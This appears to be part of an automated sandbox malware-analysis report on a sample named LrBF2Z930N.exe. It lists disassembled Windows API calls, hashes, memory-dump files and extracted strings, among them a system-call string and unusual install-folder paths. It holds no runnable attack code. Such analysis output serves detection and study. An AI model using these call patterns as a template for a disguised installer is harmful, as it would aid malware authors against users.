                                                                                      • Opcode ID: d8357044136335e67f720d888c2b01e3fca27ee9b8596f4a3e5797ea42e5a396
                                                                                      • Instruction ID: cd80167b4a2dc7f26ca63bf77dd7e4de464bc6afb1116d17c821a436824c04b4
                                                                                      • Opcode Fuzzy Hash: d8357044136335e67f720d888c2b01e3fca27ee9b8596f4a3e5797ea42e5a396
                                                                                      • Instruction Fuzzy Hash: 90B01270601400AFEE009B14DC4AF34335CF701305F240080B600C1240E3224C10C634
                                                                                      APIs
                                                                                      • GetDlgItem.USER32(?,00000403), ref: 004058A4
                                                                                      • GetDlgItem.USER32(?,000003EE), ref: 004058B3
                                                                                      • GetClientRect.USER32(?,?), ref: 004058F0
                                                                                      • GetSystemMetrics.USER32(00000002), ref: 004058F7
                                                                                      • SendMessageW.USER32(?,00001061,00000000,?), ref: 00405918
                                                                                      • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 00405929
                                                                                      • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 0040593C
                                                                                      • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 0040594A
                                                                                      • SendMessageW.USER32(?,00001024,00000000,?), ref: 0040595D
                                                                                      • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 0040597F
                                                                                      • ShowWindow.USER32(?,00000008), ref: 00405993
                                                                                      • GetDlgItem.USER32(?,000003EC), ref: 004059B4
                                                                                      • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 004059C4
                                                                                      • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 004059DD
                                                                                      • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 004059E9
                                                                                      • GetDlgItem.USER32(?,000003F8), ref: 004058C2
                                                                                        • Part of subcall function 00404636: SendMessageW.USER32(00000028,?,?,00404461), ref: 00404644
                                                                                      • GetDlgItem.USER32(?,000003EC), ref: 00405A06
                                                                                      • CreateThread.KERNEL32(00000000,00000000,Function_000057DA,00000000), ref: 00405A14
                                                                                      • CloseHandle.KERNEL32(00000000), ref: 00405A1B
                                                                                      • ShowWindow.USER32(00000000), ref: 00405A3F
                                                                                      • ShowWindow.USER32(?,00000008), ref: 00405A44
                                                                                      • ShowWindow.USER32(00000008), ref: 00405A8E
                                                                                      • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405AC2
                                                                                      • CreatePopupMenu.USER32 ref: 00405AD3
                                                                                      • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 00405AE7
                                                                                      • GetWindowRect.USER32(?,?), ref: 00405B07
                                                                                      • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 00405B20
                                                                                      • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405B58
                                                                                      • OpenClipboard.USER32(00000000), ref: 00405B68
                                                                                      • EmptyClipboard.USER32 ref: 00405B6E
                                                                                      • GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405B7A
                                                                                      • GlobalLock.KERNEL32(00000000), ref: 00405B84
                                                                                      • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405B98
                                                                                      • GlobalUnlock.KERNEL32(00000000), ref: 00405BB8
                                                                                      • SetClipboardData.USER32(0000000D,00000000), ref: 00405BC3
                                                                                      • CloseClipboard.USER32 ref: 00405BC9
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3385472183.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.3385451962.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385521995.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385544118.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385544118.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385544118.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385544118.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385544118.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385807138.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385807138.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                                                      • String ID: H/B${
                                                                                      • API String ID: 590372296-332483393
                                                                                      • Opcode ID: d18a2026774e62a2c92573f4287a0ca8136519a3f9d5dde66db426fe6a39353e
                                                                                      • Instruction ID: 1bfd88ad0a039f30930ce625e3f17186fc56f4394c79b8c388f8475f2b475093
                                                                                      • Opcode Fuzzy Hash: d18a2026774e62a2c92573f4287a0ca8136519a3f9d5dde66db426fe6a39353e
                                                                                      • Instruction Fuzzy Hash: A7B127B1900608FFDB21AF60DD85DAE7B79FB44354F00413AFA41A61A0CB795E52DF68
                                                                                      APIs
                                                                                      • GetDlgItem.USER32(?,000003FB), ref: 00404B41
                                                                                      • SetWindowTextW.USER32(00000000,?), ref: 00404B6B
                                                                                      • SHBrowseForFolderW.SHELL32(?), ref: 00404C1C
                                                                                      • CoTaskMemFree.OLE32(00000000), ref: 00404C27
                                                                                      • lstrcmpiW.KERNEL32(Call,00422F48,00000000,?,?), ref: 00404C59
                                                                                      • lstrcatW.KERNEL32(?,Call), ref: 00404C65
                                                                                      • SetDlgItemTextW.USER32(?,000003FB,?), ref: 00404C77
                                                                                        • Part of subcall function 00405CC6: GetDlgItemTextW.USER32(?,?,00000400,00404CAE), ref: 00405CD9
                                                                                        • Part of subcall function 00406930: CharNextW.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\LrBF2Z930N.exe",75923420,C:\Users\user\AppData\Local\Temp\,00000000,00403620,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040392F,?,00000008,0000000A,0000000C), ref: 00406993
                                                                                        • Part of subcall function 00406930: CharNextW.USER32(?,?,?,00000000,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 004069A2
                                                                                        • Part of subcall function 00406930: CharNextW.USER32(?,"C:\Users\user\Desktop\LrBF2Z930N.exe",75923420,C:\Users\user\AppData\Local\Temp\,00000000,00403620,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040392F,?,00000008,0000000A,0000000C), ref: 004069A7
                                                                                        • Part of subcall function 00406930: CharPrevW.USER32(?,?,75923420,C:\Users\user\AppData\Local\Temp\,00000000,00403620,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040392F,?,00000008,0000000A,0000000C), ref: 004069BA
                                                                                      • GetDiskFreeSpaceW.KERNEL32(00420F18,?,?,0000040F,?,00420F18,00420F18,?,?,00420F18,?,?,000003FB,?), ref: 00404D3A
                                                                                      • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404D55
                                                                                        • Part of subcall function 00404EAE: lstrlenW.KERNEL32(00422F48,00422F48,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404F4F
                                                                                        • Part of subcall function 00404EAE: wsprintfW.USER32 ref: 00404F58
                                                                                        • Part of subcall function 00404EAE: SetDlgItemTextW.USER32(?,00422F48), ref: 00404F6B
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3385472183.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.3385451962.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385521995.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385544118.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385544118.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385544118.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385544118.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385544118.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385807138.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385807138.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                                                      • String ID: A$C:\Users\user\eftermodnendes\ringeagt$Call$H/B$user32::EnumWindows(i r1 ,i 0)
                                                                                      • API String ID: 2624150263-2177096811
                                                                                      • Opcode ID: 4cf00c73115f53cf57be461a99467e832b164710fce0f00c931b90381e9749c6
                                                                                      • Instruction ID: 96009b05525636a0bc85a96efb184481c484ec56fefee2337862baa2afa4bf02
                                                                                      • Opcode Fuzzy Hash: 4cf00c73115f53cf57be461a99467e832b164710fce0f00c931b90381e9749c6
                                                                                      • Instruction Fuzzy Hash: DDA173B1900209ABDB11AFA5CD45AEFB7B8EF84314F11843BF601B62D1D77C99418B6D
                                                                                      APIs
                                                                                        • Part of subcall function 6E3912BB: GlobalAlloc.KERNELBASE(00000040,?,6E3912DB,?,6E39137F,00000019,6E3911CA,-000000A0), ref: 6E3912C5
                                                                                      • GlobalAlloc.KERNEL32(00000040,00001CA4), ref: 6E391D2D
                                                                                      • lstrcpyW.KERNEL32(00000008,?), ref: 6E391D75
                                                                                      • lstrcpyW.KERNEL32(00000808,?), ref: 6E391D7F
                                                                                      • GlobalFree.KERNEL32(00000000), ref: 6E391D92
                                                                                      • GlobalFree.KERNEL32(?), ref: 6E391E74
                                                                                      • GlobalFree.KERNEL32(?), ref: 6E391E79
                                                                                      • GlobalFree.KERNEL32(?), ref: 6E391E7E
                                                                                      • GlobalFree.KERNEL32(00000000), ref: 6E392068
                                                                                      • lstrcpyW.KERNEL32(?,?), ref: 6E392222
                                                                                      • GetModuleHandleW.KERNEL32(00000008), ref: 6E3922A1
                                                                                      • LoadLibraryW.KERNEL32(00000008), ref: 6E3922B2
                                                                                      • GetProcAddress.KERNEL32(?,?), ref: 6E39230C
                                                                                      • lstrlenW.KERNEL32(00000808), ref: 6E392326
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3424771390.000000006E391000.00000020.00000001.01000000.00000005.sdmp, Offset: 6E390000, based on PE: true
                                                                                      • Associated: 00000000.00000002.3422340994.000000006E390000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3429717707.000000006E394000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3429758599.000000006E396000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6e390000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: Global$Free$lstrcpy$Alloc$AddressHandleLibraryLoadModuleProclstrlen
                                                                                      • String ID:
                                                                                      • API String ID: 245916457-0
                                                                                      • Opcode ID: 570b65954dbe342b51c8ba07c03c3ab70f93f9e70ebfbeee0e92cb13144f675a
                                                                                      • Instruction ID: 4a68011a8c3e6b2670614b2b501805e8f3193b9b68b9adebec44090f784e6bee
                                                                                      • Opcode Fuzzy Hash: 570b65954dbe342b51c8ba07c03c3ab70f93f9e70ebfbeee0e92cb13144f675a
                                                                                      • Instruction Fuzzy Hash: 4A22CC71D14A0ADEDB508FE9D5806EEB7F8FF05305F12452AD1A6B3280F3719989EB60
                                                                                      APIs
                                                                                      • CoCreateInstance.OLE32(004084DC,?,?,004084CC,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 0040222E
                                                                                      Strings
                                                                                      • C:\Users\user\eftermodnendes\ringeagt\Afviklingsforlbet, xrefs: 0040226E
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3385472183.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.3385451962.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385521995.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385544118.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385544118.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385544118.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385544118.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385544118.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385807138.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385807138.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: CreateInstance
                                                                                      • String ID: C:\Users\user\eftermodnendes\ringeagt\Afviklingsforlbet
                                                                                      • API String ID: 542301482-3948318427
                                                                                      • Opcode ID: 5b0014f3340ed2e8e047bae132ec64f51d2c526b3404a8b2a52325da7d94e0b0
                                                                                      • Instruction ID: 6031f0b9305bb7b05064ab4f17c9904609ff1c452577966f293784d012f03e0b
                                                                                      • Opcode Fuzzy Hash: 5b0014f3340ed2e8e047bae132ec64f51d2c526b3404a8b2a52325da7d94e0b0
                                                                                      • Instruction Fuzzy Hash: 4A410475A00209AFCB40DFE4C989EAD7BB5BF48308B20457EF505EB2D1DB799982CB54
                                                                                      APIs
                                                                                      • FindFirstFileW.KERNEL32(00000000,?,00000002), ref: 0040291F
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3385472183.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.3385451962.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385521995.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385544118.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385544118.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385544118.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385544118.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385544118.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385807138.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385807138.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: FileFindFirst
                                                                                      • String ID:
                                                                                      • API String ID: 1974802433-0
                                                                                      • Opcode ID: 209a06d9c3b4454fc5c1ff69253149a6aac46e41fe78177cd59690df36c1804c
                                                                                      • Instruction ID: f0d7266373870d470beff65cac24d35b4a218527411e0b80208e5fb1e93adf0c
                                                                                      • Opcode Fuzzy Hash: 209a06d9c3b4454fc5c1ff69253149a6aac46e41fe78177cd59690df36c1804c
                                                                                      • Instruction Fuzzy Hash: 28F08271A04104AED701EBE4ED499AEB378EF14314F60057BE111F31E0D7B84E059B19
                                                                                      APIs
                                                                                      • GetDlgItem.USER32(?,000003F9), ref: 00405086
                                                                                      • GetDlgItem.USER32(?,00000408), ref: 00405091
                                                                                      • GlobalAlloc.KERNEL32(00000040,?), ref: 004050DB
                                                                                      • LoadImageW.USER32(0000006E,00000000,00000000,00000000,00000000), ref: 004050F2
                                                                                      • SetWindowLongW.USER32(?,000000FC,0040567B), ref: 0040510B
                                                                                      • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 0040511F
                                                                                      • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00405131
                                                                                      • SendMessageW.USER32(?,00001109,00000002), ref: 00405147
                                                                                      • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00405153
                                                                                      • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00405165
                                                                                      • DeleteObject.GDI32(00000000), ref: 00405168
                                                                                      • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00405193
                                                                                      • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 0040519F
                                                                                      • SendMessageW.USER32(?,00001132,00000000,?), ref: 0040523A
                                                                                      • SendMessageW.USER32(?,0000110A,00000003,00000110), ref: 0040526A
                                                                                        • Part of subcall function 00404636: SendMessageW.USER32(00000028,?,?,00404461), ref: 00404644
                                                                                      • SendMessageW.USER32(?,00001132,00000000,?), ref: 0040527E
                                                                                      • GetWindowLongW.USER32(?,000000F0), ref: 004052AC
                                                                                      • SetWindowLongW.USER32(?,000000F0,00000000), ref: 004052BA
                                                                                      • ShowWindow.USER32(?,00000005), ref: 004052CA
                                                                                      • SendMessageW.USER32(?,00000419,00000000,?), ref: 004053C5
                                                                                      • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 0040542A
                                                                                      • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 0040543F
                                                                                      • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00405463
                                                                                      • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00405483
                                                                                      • ImageList_Destroy.COMCTL32(?), ref: 00405498
                                                                                      • GlobalFree.KERNEL32(?), ref: 004054A8
                                                                                      • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00405521
                                                                                      • SendMessageW.USER32(?,00001102,?,?), ref: 004055CA
                                                                                      • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 004055D9
                                                                                      • InvalidateRect.USER32(?,00000000,?), ref: 00405604
                                                                                      • ShowWindow.USER32(?,00000000), ref: 00405652
                                                                                      • GetDlgItem.USER32(?,000003FE), ref: 0040565D
                                                                                      • ShowWindow.USER32(00000000), ref: 00405664
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3385472183.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.3385451962.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385521995.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385544118.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385544118.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385544118.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385544118.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385544118.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385807138.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385807138.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: MessageSend$Window$Image$ItemList_LongShow$Global$AllocCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                                      • String ID: $M$N
                                                                                      • API String ID: 2564846305-813528018
                                                                                      • Opcode ID: 324c1f4819b082b1ac23898fd696f3744d7b458a05ce4ad4b76fe224fda76cd4
                                                                                      • Instruction ID: 3eec0fee992af157883e3c32035e614d90e83c27d9cb298499668aae57dc4bf7
                                                                                      • Opcode Fuzzy Hash: 324c1f4819b082b1ac23898fd696f3744d7b458a05ce4ad4b76fe224fda76cd4
                                                                                      • Instruction Fuzzy Hash: B4029D70A00608EFDB20DF64CD45AAF7BB5FB44314F10857AE910BA2E0D7B98A42DF18
                                                                                      APIs
                                                                                      • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 0040413E
                                                                                      • ShowWindow.USER32(?), ref: 0040415E
                                                                                      • GetWindowLongW.USER32(?,000000F0), ref: 00404170
                                                                                      • ShowWindow.USER32(?,00000004), ref: 00404189
                                                                                      • DestroyWindow.USER32 ref: 0040419D
                                                                                      • SetWindowLongW.USER32(?,00000000,00000000), ref: 004041B6
                                                                                      • GetDlgItem.USER32(?,?), ref: 004041D5
                                                                                      • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 004041E9
                                                                                      • IsWindowEnabled.USER32(00000000), ref: 004041F0
                                                                                      • GetDlgItem.USER32(?,?), ref: 0040429B
                                                                                      • GetDlgItem.USER32(?,00000002), ref: 004042A5
                                                                                      • SetClassLongW.USER32(?,000000F2,?), ref: 004042BF
                                                                                      • SendMessageW.USER32(0000040F,00000000,?,?), ref: 00404310
                                                                                      • GetDlgItem.USER32(?,00000003), ref: 004043B6
                                                                                      • ShowWindow.USER32(00000000,?), ref: 004043D7
                                                                                      • EnableWindow.USER32(?,?), ref: 004043E9
                                                                                      • EnableWindow.USER32(?,?), ref: 00404404
                                                                                      • GetSystemMenu.USER32(?,00000000,0000F060,?), ref: 0040441A
                                                                                      • EnableMenuItem.USER32(00000000), ref: 00404421
                                                                                      • SendMessageW.USER32(?,000000F4,00000000,?), ref: 00404439
                                                                                      • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 0040444C
                                                                                      • lstrlenW.KERNEL32(00422F48,?,00422F48,00000000), ref: 00404476
                                                                                      • SetWindowTextW.USER32(?,00422F48), ref: 0040448A
                                                                                      • ShowWindow.USER32(?,0000000A), ref: 004045BE
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3385472183.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.3385451962.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385521995.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385544118.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385544118.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385544118.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385544118.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385544118.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385807138.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385807138.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: Window$Item$MessageSendShow$EnableLong$Menu$ClassDestroyEnabledSystemTextlstrlen
                                                                                      • String ID: H/B
                                                                                      • API String ID: 1860320154-184950203
                                                                                      • Opcode ID: 6713c34f0db6ca24ad0fd02f4a6c26255f157c0ea2add66a7142b4456e47287b
                                                                                      • Instruction ID: f8b0abefa6079376cca3afd4ac47b8e6787ccd0873a3a79b8952b84eeba681b3
                                                                                      • Opcode Fuzzy Hash: 6713c34f0db6ca24ad0fd02f4a6c26255f157c0ea2add66a7142b4456e47287b
                                                                                      • Instruction Fuzzy Hash: 91C1CFB1600204BBDB316F61EE85A2B7AB8EB85345F41053EF741B25F0CB795842DB2D
                                                                                      APIs
                                                                                      • CheckDlgButton.USER32(?,-0000040A,?), ref: 0040485E
                                                                                      • GetDlgItem.USER32(?,000003E8), ref: 00404872
                                                                                      • SendMessageW.USER32(00000000,0000045B,?,00000000), ref: 0040488F
                                                                                      • GetSysColor.USER32(?), ref: 004048A0
                                                                                      • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 004048AE
                                                                                      • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 004048BC
                                                                                      • lstrlenW.KERNEL32(?), ref: 004048C1
                                                                                      • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 004048CE
                                                                                      • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 004048E3
                                                                                      • GetDlgItem.USER32(?,0000040A), ref: 0040493C
                                                                                      • SendMessageW.USER32(00000000), ref: 00404943
                                                                                      • GetDlgItem.USER32(?,000003E8), ref: 0040496E
                                                                                      • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 004049B1
                                                                                      • LoadCursorW.USER32(00000000,00007F02), ref: 004049BF
                                                                                      • SetCursor.USER32(00000000), ref: 004049C2
                                                                                      • LoadCursorW.USER32(00000000,00007F00), ref: 004049DB
                                                                                      • SetCursor.USER32(00000000), ref: 004049DE
                                                                                      • SendMessageW.USER32(00000111,?,00000000), ref: 00404A0D
                                                                                      • SendMessageW.USER32(00000010,00000000,00000000), ref: 00404A1F
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3385472183.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.3385451962.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385521995.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385544118.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385544118.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385544118.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385544118.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385544118.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385807138.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385807138.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
                                                                                      • String ID: 7G@$Call$N
                                                                                      • API String ID: 3103080414-3155595626
                                                                                      • Opcode ID: b6dc2905c6216746abb3c0cd17d9c39e8b2e61a9098f8b336cb1d1698ee7a258
                                                                                      • Instruction ID: cd0ff63a31a53d86839c1a5ce07a34679cc09665db384d3569e6db54912acae5
                                                                                      • Opcode Fuzzy Hash: b6dc2905c6216746abb3c0cd17d9c39e8b2e61a9098f8b336cb1d1698ee7a258
                                                                                      • Instruction Fuzzy Hash: 9061B0B1A40209BFDB10AF64CD85EAA7B69FB84305F00843AF605B72D0D779AD51CF98
                                                                                      APIs
                                                                                      • CloseHandle.KERNEL32(00000000,?,00000000,?,?,00000000,?,?,00406463,?,?), ref: 00406303
                                                                                      • GetShortPathNameW.KERNEL32(?,004265E8,00000400), ref: 0040630C
                                                                                        • Part of subcall function 004060D7: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,004063BC,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004060E7
                                                                                        • Part of subcall function 004060D7: lstrlenA.KERNEL32(00000000,?,00000000,004063BC,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00406119
                                                                                      • GetShortPathNameW.KERNEL32(?,00426DE8,00000400), ref: 00406329
                                                                                      • wsprintfA.USER32 ref: 00406347
                                                                                      • GetFileSize.KERNEL32(00000000,00000000,00426DE8,C0000000,00000004,00426DE8,?,?,?,?,?), ref: 00406382
                                                                                      • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00406391
                                                                                      • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004063C9
